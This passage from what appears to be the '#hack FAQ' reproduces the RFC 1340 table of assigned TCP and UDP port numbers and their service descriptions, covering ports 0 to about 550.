                           22. WHAT PORT IS XXX ON?
                                       
        THE FILE /ETC/SERVICES ON MOST UNIX MACHINES LISTS THE ACTIVITY
        OCCURRING ON EACH PORT.  HERE IS THE MOST COMPLETE PORT LIST IN
                 EXISTENCE, ORIGINALLY PRESENTED IN RFC 1340:
                                       
                    KEYWORD         DECIMAL    DESCRIPTION
                    -------         -------    -----------
                                        0/TCP    RESERVED
                                        0/UDP    RESERVED
            TCPMUX            1/TCP    TCP PORT SERVICE MULTIPLEXER

                                                            #hack FAQ (70/1699)
            TCPMUX            1/UDP    TCP PORT SERVICE MULTIPLEXER
                 COMPRESSNET       2/TCP    MANAGEMENT UTILITY
                 COMPRESSNET       2/UDP    MANAGEMENT UTILITY
                COMPRESSNET       3/TCP    COMPRESSION PROCESS
                COMPRESSNET       3/UDP    COMPRESSION PROCESS
                                       4/TCP    UNASSIGNED
                                       4/UDP    UNASSIGNED
                  RJE               5/TCP    REMOTE JOB ENTRY
                  RJE               5/UDP    REMOTE JOB ENTRY
                                       6/TCP    UNASSIGNED
                                       6/UDP    UNASSIGNED
                        ECHO              7/TCP    ECHO
                        ECHO              7/UDP    ECHO
                                       8/TCP    UNASSIGNED
                                       8/UDP    UNASSIGNED
                      DISCARD           9/TCP    DISCARD
                      DISCARD           9/UDP    DISCARD
                                      10/TCP    UNASSIGNED
                                      10/UDP    UNASSIGNED
                    SYSTAT           11/TCP    ACTIVE USERS
                    SYSTAT           11/UDP    ACTIVE USERS
                                      12/TCP    UNASSIGNED

                                                            #hack FAQ (70/1721)
                                      12/UDP    UNASSIGNED
                      DAYTIME          13/TCP    DAYTIME
                      DAYTIME          13/UDP    DAYTIME
                                      14/TCP    UNASSIGNED
                                      14/UDP    UNASSIGNED
                               15/TCP    UNASSIGNED [WAS NETSTAT]
                                      15/UDP    UNASSIGNED
                                      16/TCP    UNASSIGNED
                                      16/UDP    UNASSIGNED
                  QOTD             17/TCP    QUOTE OF THE DAY
                  QOTD             17/UDP    QUOTE OF THE DAY
               MSP              18/TCP    MESSAGE SEND PROTOCOL
               MSP              18/UDP    MESSAGE SEND PROTOCOL
                CHARGEN          19/TCP    CHARACTER GENERATOR
                CHARGEN          19/UDP    CHARACTER GENERATOR
            FTP-DATA         20/TCP    FILE TRANSFER [DEFAULT DATA]
            FTP-DATA         20/UDP    FILE TRANSFER [DEFAULT DATA]
              FTP              21/TCP    FILE TRANSFER [CONTROL]
              FTP              21/UDP    FILE TRANSFER [CONTROL]
                                      22/TCP    UNASSIGNED
                                      22/UDP    UNASSIGNED
                       TELNET           23/TCP    TELNET

                                                            #hack FAQ (70/1743)
                       TELNET           23/UDP    TELNET
                               24/TCP    ANY PRIVATE MAIL SYSTEM
                               24/UDP    ANY PRIVATE MAIL SYSTEM
                SMTP             25/TCP    SIMPLE MAIL TRANSFER
                SMTP             25/UDP    SIMPLE MAIL TRANSFER
                                      26/TCP    UNASSIGNED
                                      26/UDP    UNASSIGNED
                 NSW-FE           27/TCP    NSW USER SYSTEM FE
                 NSW-FE           27/UDP    NSW USER SYSTEM FE
                                      28/TCP    UNASSIGNED
                                      28/UDP    UNASSIGNED
                      MSG-ICP          29/TCP    MSG ICP
                      MSG-ICP          29/UDP    MSG ICP
                                      30/TCP    UNASSIGNED
                                      30/UDP    UNASSIGNED
                 MSG-AUTH         31/TCP    MSG AUTHENTICATION
                 MSG-AUTH         31/UDP    MSG AUTHENTICATION
                                      32/TCP    UNASSIGNED
                                      32/UDP    UNASSIGNED
              DSP              33/TCP    DISPLAY SUPPORT PROTOCOL
              DSP              33/UDP    DISPLAY SUPPORT PROTOCOL
                                      34/TCP    UNASSIGNED

                                                            #hack FAQ (70/1765)
                                      34/UDP    UNASSIGNED
                              35/TCP    ANY PRIVATE PRINTER SERVER
                              35/UDP    ANY PRIVATE PRINTER SERVER
                                      36/TCP    UNASSIGNED
                                      36/UDP    UNASSIGNED
                        TIME             37/TCP    TIME
                        TIME             37/UDP    TIME
                                      38/TCP    UNASSIGNED
                                      38/UDP    UNASSIGNED
             RLP              39/TCP    RESOURCE LOCATION PROTOCOL
             RLP              39/UDP    RESOURCE LOCATION PROTOCOL
                                      40/TCP    UNASSIGNED
                                      40/UDP    UNASSIGNED
                      GRAPHICS         41/TCP    GRAPHICS
                      GRAPHICS         41/UDP    GRAPHICS
                  NAMESERVER       42/TCP    HOST NAME SERVER
                  NAMESERVER       42/UDP    HOST NAME SERVER
                       NICNAME          43/TCP    WHO IS
                       NICNAME          43/UDP    WHO IS
                 MPM-FLAGS        44/TCP    MPM FLAGS PROTOCOL
                 MPM-FLAGS        44/UDP    MPM FLAGS PROTOCOL
          MPM              45/TCP    MESSAGE PROCESSING MODULE [RECV]

                                                            #hack FAQ (70/1787)
          MPM              45/UDP    MESSAGE PROCESSING MODULE [RECV]
                 MPM-SND          46/TCP    MPM [DEFAULT SEND]
                 MPM-SND          46/UDP    MPM [DEFAULT SEND]
                       NI-FTP           47/TCP    NI FTP
                       NI-FTP           47/UDP    NI FTP
                                      48/TCP    UNASSIGNED
                                      48/UDP    UNASSIGNED
                LOGIN            49/TCP    LOGIN HOST PROTOCOL
                LOGIN            49/UDP    LOGIN HOST PROTOCOL
           RE-MAIL-CK       50/TCP    REMOTE MAIL CHECKING PROTOCOL
           RE-MAIL-CK       50/UDP    REMOTE MAIL CHECKING PROTOCOL
          LA-MAINT         51/TCP    IMP LOGICAL ADDRESS MAINTENANCE
          LA-MAINT         51/UDP    IMP LOGICAL ADDRESS MAINTENANCE
                 XNS-TIME         52/TCP    XNS TIME PROTOCOL
                 XNS-TIME         52/UDP    XNS TIME PROTOCOL
                 DOMAIN           53/TCP    DOMAIN NAME SERVER
                 DOMAIN           53/UDP    DOMAIN NAME SERVER
                 XNS-CH           54/TCP    XNS CLEARINGHOUSE
                 XNS-CH           54/UDP    XNS CLEARINGHOUSE
               ISI-GL           55/TCP    ISI GRAPHICS LANGUAGE
               ISI-GL           55/UDP    ISI GRAPHICS LANGUAGE
                 XNS-AUTH         56/TCP    XNS AUTHENTICATION

                                                            #hack FAQ (70/1809)
                 XNS-AUTH         56/UDP    XNS AUTHENTICATION
                             57/TCP    ANY PRIVATE TERMINAL ACCESS
                             57/UDP    ANY PRIVATE TERMINAL ACCESS
                      XNS-MAIL         58/TCP    XNS MAIL
                      XNS-MAIL         58/UDP    XNS MAIL
                               59/TCP    ANY PRIVATE FILE SERVICE
                               59/UDP    ANY PRIVATE FILE SERVICE
                                      60/TCP    UNASSIGNED
                                      60/UDP    UNASSIGNED
                      NI-MAIL          61/TCP    NI MAIL
                      NI-MAIL          61/UDP    NI MAIL
                    ACAS             62/TCP    ACA SERVICES
                    ACAS             62/UDP    ACA SERVICES
                 VIA-FTP          63/TCP    VIA SYSTEMS - FTP
                 VIA-FTP          63/UDP    VIA SYSTEMS - FTP
           COVIA            64/TCP    COMMUNICATIONS INTEGRATOR (CI)
           COVIA            64/UDP    COMMUNICATIONS INTEGRATOR (CI)
              TACACS-DS        65/TCP    TACACS-DATABASE SERVICE
              TACACS-DS        65/UDP    TACACS-DATABASE SERVICE
                   SQL*NET          66/TCP    ORACLE SQL*NET
                   SQL*NET          66/UDP    ORACLE SQL*NET
             BOOTPS           67/TCP    BOOTSTRAP PROTOCOL SERVER

                                                            #hack FAQ (70/1831)
             BOOTPS           67/UDP    BOOTSTRAP PROTOCOL SERVER
             BOOTPC           68/TCP    BOOTSTRAP PROTOCOL CLIENT
             BOOTPC           68/UDP    BOOTSTRAP PROTOCOL CLIENT
               TFTP             69/TCP    TRIVIAL FILE TRANSFER
               TFTP             69/UDP    TRIVIAL FILE TRANSFER
                       GOPHER           70/TCP    GOPHER
                       GOPHER           70/UDP    GOPHER
                 NETRJS-1         71/TCP    REMOTE JOB SERVICE
                 NETRJS-1         71/UDP    REMOTE JOB SERVICE
                 NETRJS-2         72/TCP    REMOTE JOB SERVICE
                 NETRJS-2         72/UDP    REMOTE JOB SERVICE
                 NETRJS-3         73/TCP    REMOTE JOB SERVICE
                 NETRJS-3         73/UDP    REMOTE JOB SERVICE
                 NETRJS-4         74/TCP    REMOTE JOB SERVICE
                 NETRJS-4         74/UDP    REMOTE JOB SERVICE
                             75/TCP    ANY PRIVATE DIAL OUT SERVICE
                             75/UDP    ANY PRIVATE DIAL OUT SERVICE
                                      76/TCP    UNASSIGNED
                                      76/UDP    UNASSIGNED
                               77/TCP    ANY PRIVATE RJE SERVICE
                               77/UDP    ANY PRIVATE RJE SERVICE
                       VETTCP           78/TCP    VETTCP

                                                            #hack FAQ (70/1853)
                       VETTCP           78/UDP    VETTCP
                       FINGER           79/TCP    FINGER
                       FINGER           79/UDP    FINGER
                WWW              80/TCP    WORLD WIDE WEB HTTP
                WWW              80/UDP    WORLD WIDE WEB HTTP
                 HOSTS2-NS        81/TCP    HOSTS2 NAME SERVER
                 HOSTS2-NS        81/UDP    HOSTS2 NAME SERVER
                    XFER             82/TCP    XFER UTILITY
                    XFER             82/UDP    XFER UTILITY
                   MIT-ML-DEV       83/TCP    MIT ML DEVICE
                   MIT-ML-DEV       83/UDP    MIT ML DEVICE
               CTF              84/TCP    COMMON TRACE FACILITY
               CTF              84/UDP    COMMON TRACE FACILITY
                   MIT-ML-DEV       85/TCP    MIT ML DEVICE
                   MIT-ML-DEV       85/UDP    MIT ML DEVICE
                 MFCOBOL          86/TCP    MICRO FOCUS COBOL
                 MFCOBOL          86/UDP    MICRO FOCUS COBOL
                              87/TCP    ANY PRIVATE TERMINAL LINK
                              87/UDP    ANY PRIVATE TERMINAL LINK
                      KERBEROS         88/TCP    KERBEROS
                      KERBEROS         88/UDP    KERBEROS
               SU-MIT-TG        89/TCP    SU/MIT TELNET GATEWAY

                                                            #hack FAQ (70/1875)
               SU-MIT-TG        89/UDP    SU/MIT TELNET GATEWAY
         DNSIX            90/TCP    DNSIX SECURIT ATTRIBUTE TOKEN MAP
         DNSIX            90/UDP    DNSIX SECURIT ATTRIBUTE TOKEN MAP
                 MIT-DOV          91/TCP    MIT DOVER SPOOLER
                 MIT-DOV          91/UDP    MIT DOVER SPOOLER
             NPP              92/TCP    NETWORK PRINTING PROTOCOL
             NPP              92/UDP    NETWORK PRINTING PROTOCOL
              DCP              93/TCP    DEVICE CONTROL PROTOCOL
              DCP              93/UDP    DEVICE CONTROL PROTOCOL
              OBJCALL          94/TCP    TIVOLI OBJECT DISPATCHER
              OBJCALL          94/UDP    TIVOLI OBJECT DISPATCHER
                       SUPDUP           95/TCP    SUPDUP
                       SUPDUP           95/UDP    SUPDUP
            DIXIE            96/TCP    DIXIE PROTOCOL SPECIFICATION
            DIXIE            96/UDP    DIXIE PROTOCOL SPECIFICATION
         SWIFT-RVF        97/TCP    SWIFT REMOTE VITURAL FILE PROTOCOL
         SWIFT-RVF        97/UDP    SWIFT REMOTE VITURAL FILE PROTOCOL
                      TACNEWS          98/TCP    TAC NEWS
                      TACNEWS          98/UDP    TAC NEWS
                   METAGRAM         99/TCP    METAGRAM RELAY
                   METAGRAM         99/UDP    METAGRAM RELAY
                 NEWACCT         100/TCP    [UNAUTHORIZED USE]

                                                            #hack FAQ (70/1897)
                HOSTNAME        101/TCP    NIC HOST NAME SERVER
                HOSTNAME        101/UDP    NIC HOST NAME SERVER
                      ISO-TSAP        102/TCP    ISO-TSAP
                      ISO-TSAP        102/UDP    ISO-TSAP
          GPPITNP         103/TCP    GENESIS POINT-TO-POINT TRANS NET
          GPPITNP         103/UDP    GENESIS POINT-TO-POINT TRANS NET
         ACR-NEMA        104/TCP    ACR-NEMA DIGITAL IMAG. & COMM. 300
         ACR-NEMA        104/UDP    ACR-NEMA DIGITAL IMAG. & COMM. 300
              CSNET-NS        105/TCP    MAILBOX NAME NAMESERVER
              CSNET-NS        105/UDP    MAILBOX NAME NAMESERVER
                     3COM-TSMUX      106/TCP    3COM-TSMUX
                     3COM-TSMUX      106/UDP    3COM-TSMUX
               RTELNET         107/TCP    REMOTE TELNET SERVICE
               RTELNET         107/UDP    REMOTE TELNET SERVICE
             SNAGAS          108/TCP    SNA GATEWAY ACCESS SERVER
             SNAGAS          108/UDP    SNA GATEWAY ACCESS SERVER
          POP2            109/TCP    POST OFFICE PROTOCOL - VERSION 2
          POP2            109/UDP    POST OFFICE PROTOCOL - VERSION 2
          POP3            110/TCP    POST OFFICE PROTOCOL - VERSION 3
          POP3            110/UDP    POST OFFICE PROTOCOL - VERSION 3
             SUNRPC          111/TCP    SUN REMOTE PROCEDURE CALL
             SUNRPC          111/UDP    SUN REMOTE PROCEDURE CALL

                                                            #hack FAQ (70/1919)
         MCIDAS          112/TCP    MCIDAS DATA TRANSMISSION PROTOCOL
         MCIDAS          112/UDP    MCIDAS DATA TRANSMISSION PROTOCOL
               AUTH            113/TCP    AUTHENTICATION SERVICE
               AUTH            113/UDP    AUTHENTICATION SERVICE
                AUDIONEWS       114/TCP    AUDIO NEWS MULTICAST
                AUDIONEWS       114/UDP    AUDIO NEWS MULTICAST
           SFTP            115/TCP    SIMPLE FILE TRANSFER PROTOCOL
           SFTP            115/UDP    SIMPLE FILE TRANSFER PROTOCOL
                  ANSANOTIFY      116/TCP    ANSA REX NOTIFY
                  ANSANOTIFY      116/UDP    ANSA REX NOTIFY
                 UUCP-PATH       117/TCP    UUCP PATH SERVICE
                 UUCP-PATH       117/UDP    UUCP PATH SERVICE
                    SQLSERV         118/TCP    SQL SERVICES
                    SQLSERV         118/UDP    SQL SERVICES
           NNTP            119/TCP    NETWORK NEWS TRANSFER PROTOCOL
           NNTP            119/UDP    NETWORK NEWS TRANSFER PROTOCOL
                      CFDPTKT         120/TCP    CFDPTKT
                      CFDPTKT         120/UDP    CFDPTKT
          ERPC            121/TCP    ENCORE EXPEDITED REMOTE PRO.CALL
          ERPC            121/UDP    ENCORE EXPEDITED REMOTE PRO.CALL
                      SMAKYNET        122/TCP    SMAKYNET
                      SMAKYNET        122/UDP    SMAKYNET

                                                            #hack FAQ (70/1941)
               NTP             123/TCP    NETWORK TIME PROTOCOL
               NTP             123/UDP    NETWORK TIME PROTOCOL
                  ANSATRADER      124/TCP    ANSA REX TRADER
                  ANSATRADER      124/UDP    ANSA REX TRADER
           LOCUS-MAP       125/TCP    LOCUS PC-INTERFACE NET MAP SER
           LOCUS-MAP       125/UDP    LOCUS PC-INTERFACE NET MAP SER
                UNITARY         126/TCP    UNISYS UNITARY LOGIN
                UNITARY         126/UDP    UNISYS UNITARY LOGIN
           LOCUS-CON       127/TCP    LOCUS PC-INTERFACE CONN SERVER
           LOCUS-CON       127/UDP    LOCUS PC-INTERFACE CONN SERVER
             GSS-XLICEN      128/TCP    GSS X LICENSE VERIFICATION
             GSS-XLICEN      128/UDP    GSS X LICENSE VERIFICATION
            PWDGEN          129/TCP    PASSWORD GENERATOR PROTOCOL
            PWDGEN          129/UDP    PASSWORD GENERATOR PROTOCOL
                   CISCO-FNA       130/TCP    CISCO FNATIVE
                   CISCO-FNA       130/UDP    CISCO FNATIVE
                   CISCO-TNA       131/TCP    CISCO TNATIVE
                   CISCO-TNA       131/UDP    CISCO TNATIVE
                   CISCO-SYS       132/TCP    CISCO SYSMAINT
                   CISCO-SYS       132/UDP    CISCO SYSMAINT
                 STATSRV         133/TCP    STATISTICS SERVICE
                 STATSRV         133/UDP    STATISTICS SERVICE

                                                            #hack FAQ (70/1963)
                 INGRES-NET      134/TCP    INGRES-NET SERVICE
                 INGRES-NET      134/UDP    INGRES-NET SERVICE
                  LOC-SRV         135/TCP    LOCATION SERVICE
                  LOC-SRV         135/UDP    LOCATION SERVICE
               PROFILE         136/TCP    PROFILE NAMING SYSTEM
               PROFILE         136/UDP    PROFILE NAMING SYSTEM
                NETBIOS-NS      137/TCP    NETBIOS NAME SERVICE
                NETBIOS-NS      137/UDP    NETBIOS NAME SERVICE
              NETBIOS-DGM     138/TCP    NETBIOS DATAGRAM SERVICE
              NETBIOS-DGM     138/UDP    NETBIOS DATAGRAM SERVICE
              NETBIOS-SSN     139/TCP    NETBIOS SESSION SERVICE
              NETBIOS-SSN     139/UDP    NETBIOS SESSION SERVICE
                 EMFIS-DATA      140/TCP    EMFIS DATA SERVICE
                 EMFIS-DATA      140/UDP    EMFIS DATA SERVICE
               EMFIS-CNTL      141/TCP    EMFIS CONTROL SERVICE
               EMFIS-CNTL      141/UDP    EMFIS CONTROL SERVICE
                  BL-IDM          142/TCP    BRITTON-LEE IDM
                  BL-IDM          142/UDP    BRITTON-LEE IDM
          IMAP2           143/TCP    INTERIM MAIL ACCESS PROTOCOL V2
          IMAP2           143/UDP    INTERIM MAIL ACCESS PROTOCOL V2
                        NEWS            144/TCP    NEWS
                        NEWS            144/UDP    NEWS

                                                            #hack FAQ (70/1985)
                   UAAC            145/TCP    UAAC PROTOCOL
                   UAAC            145/UDP    UAAC PROTOCOL
                      ISO-TP0         146/TCP    ISO-IP0
                      ISO-TP0         146/UDP    ISO-IP0
                       ISO-IP          147/TCP    ISO-IP
                       ISO-IP          147/UDP    ISO-IP
                   CRONUS          148/TCP    CRONUS-SUPPORT
                   CRONUS          148/UDP    CRONUS-SUPPORT
             AED-512         149/TCP    AED 512 EMULATION SERVICE
             AED-512         149/UDP    AED 512 EMULATION SERVICE
                      SQL-NET         150/TCP    SQL-NET
                      SQL-NET         150/UDP    SQL-NET
                        HEMS            151/TCP    HEMS
                        HEMS            151/UDP    HEMS
          BFTP            152/TCP    BACKGROUND FILE TRANSFER PROGRAM
          BFTP            152/UDP    BACKGROUND FILE TRANSFER PROGRAM
                        SGMP            153/TCP    SGMP
                        SGMP            153/UDP    SGMP
                       NETSC-PROD      154/TCP    NETSC
                       NETSC-PROD      154/UDP    NETSC
                       NETSC-DEV       155/TCP    NETSC
                       NETSC-DEV       155/UDP    NETSC

                                                            #hack FAQ (70/2007)
                    SQLSRV          156/TCP    SQL SERVICE
                    SQLSRV          156/UDP    SQL SERVICE
          KNET-CMP        157/TCP    KNET/VM COMMAND/MESSAGE PROTOCOL
          KNET-CMP        157/UDP    KNET/VM COMMAND/MESSAGE PROTOCOL
                   PCMAIL-SRV      158/TCP    PCMAIL SERVER
                   PCMAIL-SRV      158/UDP    PCMAIL SERVER
                     NSS-ROUTING     159/TCP   NSS-ROUTING
                     NSS-ROUTING     159/UDP   NSS-ROUTING
                     SGMP-TRAPS      160/TCP    SGMP-TRAPS
                     SGMP-TRAPS      160/UDP    SGMP-TRAPS
                        SNMP            161/TCP    SNMP
                        SNMP            161/UDP    SNMP
                      SNMPTRAP        162/TCP    SNMPTRAP
                      SNMPTRAP        162/UDP    SNMPTRAP
                  CMIP-MAN        163/TCP    CMIP/TCP MANAGER
                  CMIP-MAN        163/UDP    CMIP/TCP MANAGER
                   CMIP-AGENT      164/TCP    CMIP/TCP AGENT
                   SMIP-AGENT      164/UDP    CMIP/TCP AGENT
                        XNS-COURIER     165/TCP   XEROX
                        XNS-COURIER     165/UDP   XEROX
                   S-NET           166/TCP    SIRIUS SYSTEMS
                   S-NET           166/UDP    SIRIUS SYSTEMS

                                                            #hack FAQ (70/2029)
                        NAMP            167/TCP    NAMP
                        NAMP            167/UDP    NAMP
                        RSVD            168/TCP    RSVD
                        RSVD            168/UDP    RSVD
                        SEND            169/TCP    SEND
                        SEND            169/UDP    SEND
                 PRINT-SRV       170/TCP    NETWORK POSTSCRIPT
                 PRINT-SRV       170/UDP    NETWORK POSTSCRIPT
           MULTIPLEX       171/TCP    NETWORK INNOVATIONS MULTIPLEX
           MULTIPLEX       171/UDP    NETWORK INNOVATIONS MULTIPLEX
              CL/1            172/TCP    NETWORK INNOVATIONS CL/1
              CL/1            172/UDP    NETWORK INNOVATIONS CL/1
                       XYPLEX-MUX      173/TCP    XYPLEX
                       XYPLEX-MUX      173/UDP    XYPLEX
                       MAILQ           174/TCP    MAILQ
                       MAILQ           174/UDP    MAILQ
                       VMNET           175/TCP    VMNET
                       VMNET           175/UDP    VMNET
                     GENRAD-MUX      176/TCP    GENRAD-MUX
                     GENRAD-MUX      176/UDP    GENRAD-MUX
         XDMCP           177/TCP    X DISPLAY MANAGER CONTROL PROTOCOL
         XDMCP           177/UDP    X DISPLAY MANAGER CONTROL PROTOCOL

                                                            #hack FAQ (70/2051)
               NEXTSTEP        178/TCP    NEXTSTEP WINDOW SERVER
               NEXTSTEP        178/UDP    NEXTSTEP WINDOW SERVER
              BGP             179/TCP    BORDER GATEWAY PROTOCOL
              BGP             179/UDP    BORDER GATEWAY PROTOCOL
                     RIS             180/TCP    INTERGRAPH
                     RIS             180/UDP    INTERGRAPH
                       UNIFY           181/TCP    UNIFY
                       UNIFY           181/UDP    UNIFY
                 AUDIT           182/TCP    UNISYS AUDIT SITP
                 AUDIT           182/UDP    UNISYS AUDIT SITP
                      OCBINDER        183/TCP    OCBINDER
                      OCBINDER        183/UDP    OCBINDER
                      OCSERVER        184/TCP    OCSERVER
                      OCSERVER        184/UDP    OCSERVER
                     REMOTE-KIS      185/TCP    REMOTE-KIS
                     REMOTE-KIS      185/UDP    REMOTE-KIS
                    KIS             186/TCP    KIS PROTOCOL
                    KIS             186/UDP    KIS PROTOCOL
        ACI             187/TCP    APPLICATION COMMUNICATION INTERFACE
        ACI             187/UDP    APPLICATION COMMUNICATION INTERFACE
                 MUMPS           188/TCP    PLUS FIVE'S MUMPS
                 MUMPS           188/UDP    PLUS FIVE'S MUMPS

                                                            #hack FAQ (70/2073)
               QFT             189/TCP    QUEUED FILE TRANSPORT
               QFT             189/UDP    QUEUED FILE TRANSPORT
          GACP            190/TCP    GATEWAY ACCESS CONTROL PROTOCOL
          CACP            190/UDP    GATEWAY ACCESS CONTROL PROTOCOL
                      PROSPERO        191/TCP    PROSPERO
                      PROSPERO        191/UDP    PROSPERO
           OSU-NMS         192/TCP    OSU NETWORK MONITORING SYSTEM
           OSU-NMS         192/UDP    OSU NETWORK MONITORING SYSTEM
         SRMP            193/TCP    SPIDER REMOTE MONITORING PROTOCOL
         SRMP            193/UDP    SPIDER REMOTE MONITORING PROTOCOL
            IRC             194/TCP    INTERNET RELAY CHAT PROTOCOL
            IRC             194/UDP    INTERNET RELAY CHAT PROTOCOL
          DN6-NLM-AUD     195/TCP    DNSIX NETWORK LEVEL MODULE AUDIT
          DN6-NLM-AUD     195/UDP    DNSIX NETWORK LEVEL MODULE AUDIT
        DN6-SMM-RED     196/TCP    DNSIX SESSION MGT MODULE AUDIT REDIR
        DN6-SMM-RED     196/UDP    DNSIX SESSION MGT MODULE AUDIT REDIR
             DLS             197/TCP    DIRECTORY LOCATION SERVICE
             DLS             197/UDP    DIRECTORY LOCATION SERVICE
         DLS-MON         198/TCP    DIRECTORY LOCATION SERVICE MONITOR
         DLS-MON         198/UDP    DIRECTORY LOCATION SERVICE MONITOR
                        SMUX            199/TCP    SMUX
                        SMUX            199/UDP    SMUX

                                                            #hack FAQ (70/2095)
           SRC             200/TCP    IBM SYSTEM RESOURCE CONTROLLER
           SRC             200/UDP    IBM SYSTEM RESOURCE CONTROLLER
           AT-RTMP         201/TCP    APPLETALK ROUTING MAINTENANCE
           AT-RTMP         201/UDP    APPLETALK ROUTING MAINTENANCE
               AT-NBP          202/TCP    APPLETALK NAME BINDING
               AT-NBP          202/UDP    APPLETALK NAME BINDING
                  AT-3            203/TCP    APPLETALK UNUSED
                  AT-3            203/UDP    APPLETALK UNUSED
                   AT-ECHO         204/TCP    APPLETALK ECHO
                   AT-ECHO         204/UDP    APPLETALK ECHO
                  AT-5            205/TCP    APPLETALK UNUSED
                  AT-5            205/UDP    APPLETALK UNUSED
             AT-ZIS          206/TCP    APPLETALK ZONE INFORMATION
             AT-ZIS          206/UDP    APPLETALK ZONE INFORMATION
                  AT-7            207/TCP    APPLETALK UNUSED
                  AT-7            207/UDP    APPLETALK UNUSED
                  AT-8            208/TCP    APPLETALK UNUSED
                  AT-8            208/UDP    APPLETALK UNUSED
        TAM             209/TCP    TRIVIAL AUTHENTICATED MAIL PROTOCOL
        TAM             209/UDP    TRIVIAL AUTHENTICATED MAIL PROTOCOL
                    Z39.50          210/TCP    ANSI Z39.50
                    Z39.50          210/UDP    ANSI Z39.50

                                                            #hack FAQ (70/2117)
         914C/G          211/TCP    TEXAS INSTRUMENTS 914C/G TERMINAL
         914C/G          211/UDP    TEXAS INSTRUMENTS 914C/G TERMINAL
                      ANET            212/TCP    ATEXSSTR
                      ANET            212/UDP    ATEXSSTR
                        IPX             213/TCP    IPX
                        IPX             213/UDP    IPX
                      VMPWSCS         214/TCP    VM PWSCS
                      VMPWSCS         214/UDP    VM PWSCS
                 SOFTPC          215/TCP    INSIGNIA SOLUTIONS
                 SOFTPC          215/UDP    INSIGNIA SOLUTIONS
          ATLS            216/TCP    ACCESS TECHNOLOGY LICENSE SERVER
          ATLS            216/UDP    ACCESS TECHNOLOGY LICENSE SERVER
                     DBASE           217/TCP    DBASE UNIX
                     DBASE           217/UDP    DBASE UNIX
           MPP             218/TCP    NETIX MESSAGE POSTING PROTOCOL
           MPP             218/UDP    NETIX MESSAGE POSTING PROTOCOL
                    UARPS           219/TCP    UNISYS ARPS
                    UARPS           219/UDP    UNISYS ARPS
        IMAP3           220/TCP    INTERACTIVE MAIL ACCESS PROTOCOL V3
        IMAP3           220/UDP    INTERACTIVE MAIL ACCESS PROTOCOL V3
           FLN-SPX         221/TCP    BERKELEY RLOGIND WITH SPX AUTH
           FLN-SPX         221/UDP    BERKELEY RLOGIND WITH SPX AUTH

                                                            #hack FAQ (70/2139)
            FSH-SPX         222/TCP    BERKELEY RSHD WITH SPX AUTH
            FSH-SPX         222/UDP    BERKELEY RSHD WITH SPX AUTH
          CDC             223/TCP    CERTIFICATE DISTRIBUTION CENTER
          CDC             223/UDP    CERTIFICATE DISTRIBUTION CENTER
                                      224-241    RESERVED
                 SUR-MEAS        243/TCP    SURVEY MEASUREMENT
                 SUR-MEAS        243/UDP    SURVEY MEASUREMENT
                        LINK            245/TCP    LINK
                        LINK            245/UDP    LINK
              DSP3270         246/TCP    DISPLAY SYSTEMS PROTOCOL
              DSP3270         246/UDP    DISPLAY SYSTEMS PROTOCOL
                                      247-255    RESERVED
              PAWSERV         345/TCP    PERF ANALYSIS WORKBENCH
              PAWSERV         345/UDP    PERF ANALYSIS WORKBENCH
                    ZSERV           346/TCP    ZEBRA SERVER
                    ZSERV           346/UDP    ZEBRA SERVER
                   FATSERV         347/TCP    FATMEN SERVER
                   FATSERV         347/UDP    FATMEN SERVER
                     CLEARCASE       371/TCP    CLEARCASE
                     CLEARCASE       371/UDP    CLEARCASE
                   ULISTSERV       372/TCP    UNIX LISTSERV
                   ULISTSERV       372/UDP    UNIX LISTSERV

                                                            #hack FAQ (70/2161)
                 LEGENT-1        373/TCP    LEGENT CORPORATION
                 LEGENT-1        373/UDP    LEGENT CORPORATION
                 LEGENT-2        374/TCP    LEGENT CORPORATION
                 LEGENT-2        374/UDP    LEGENT CORPORATION
             EXEC            512/TCP    REMOTE PROCESS EXECUTION;
                                      AUTHENTICATION PERFORMED USING
                                      PASSWORDS AND UNIX LOGIN NAMES
        BIFF            512/UDP    USED BY MAIL SYSTEM TO NOTIFY USERS
                                     OF NEW MAIL RECEIVED; CURRENTLY
                                       RECEIVES MESSAGES ONLY FROM
                                      PROCESSES ON THE SAME MACHINE
             LOGIN           513/TCP    REMOTE LOGIN A LA TELNET;
                                    AUTOMATIC AUTHENTICATION PERFORMED
                                    BASED ON PRIVILEDGED PORT NUMBERS
                                     AND DISTRIBUTED DATA BASES WHICH
                                    IDENTIFY "AUTHENTICATION DOMAINS"
         WHO             513/UDP    MAINTAINS DATA BASES SHOWING WHO'S
                                     LOGGED IN TO MACHINES ON A LOCAL
                                     NET AND THE LOAD AVERAGE OF THE
                                                 MACHINE
              CMD             514/TCP    LIKE EXEC, BUT AUTOMATIC
                                    AUTHENTICATION IS PERFORMED AS FOR

                                                            #hack FAQ (70/2183)
                                               LOGIN SERVER
                            SYSLOG          514/UDP
                      PRINTER         515/TCP    SPOOLER
                      PRINTER         515/UDP    SPOOLER
            TALK            517/TCP    LIKE TENEX LINK, BUT ACROSS
                                     MACHINE - UNFORTUNATELY, DOESN'T
                                   USE LINK PROTOCOL (THIS IS ACTUALLY
                                   JUST A RENDEZVOUS PORT FROM WHICH A
                                      TCP CONNECTION IS ESTABLISHED)
            TALK            517/UDP    LIKE TENEX LINK, BUT ACROSS
                                     MACHINE - UNFORTUNATELY, DOESN'T
                                   USE LINK PROTOCOL (THIS IS ACTUALLY
                                   JUST A RENDEZVOUS PORT FROM WHICH A
                                      TCP CONNECTION IS ESTABLISHED)
                            NTALK           518/TCP
                            NTALK           518/UDP
                      UTIME           519/TCP    UNIXTIME
                      UTIME           519/UDP    UNIXTIME
             EFS             520/TCP    EXTENDED FILE NAME SERVER
          ROUTER          520/UDP    LOCAL ROUTING PROCESS (ON SITE);
                                     USES VARIANT OF XEROX NS ROUTING
                                           INFORMATION PROTOCOL

                                                            #hack FAQ (70/2205)
                     TIMED           525/TCP    TIMESERVER
                     TIMED           525/UDP    TIMESERVER
                      TEMPO           526/TCP    NEWDATE
                      TEMPO           526/UDP    NEWDATE
                        COURIER         530/TCP    RPC
                        COURIER         530/UDP    RPC
                        CONFERENCE      531/TCP    CHAT
                        CONFERENCE      531/UDP    CHAT
                      NETNEWS         532/TCP    READNEWS
                      NETNEWS         532/UDP    READNEWS
              NETWALL         533/TCP    FOR EMERGENCY BROADCASTS
              NETWALL         533/UDP    FOR EMERGENCY BROADCASTS
                       UUCP            540/TCP    UUCPD
                       UUCP            540/UDP    UUCPD
                            KLOGIN          543/TCP
                            KLOGIN          543/UDP
                       KSHELL          544/TCP    KRCMD
                       KSHELL          544/UDP    KRCMD
                      NEW-RWHO        550/TCP    NEW-WHO
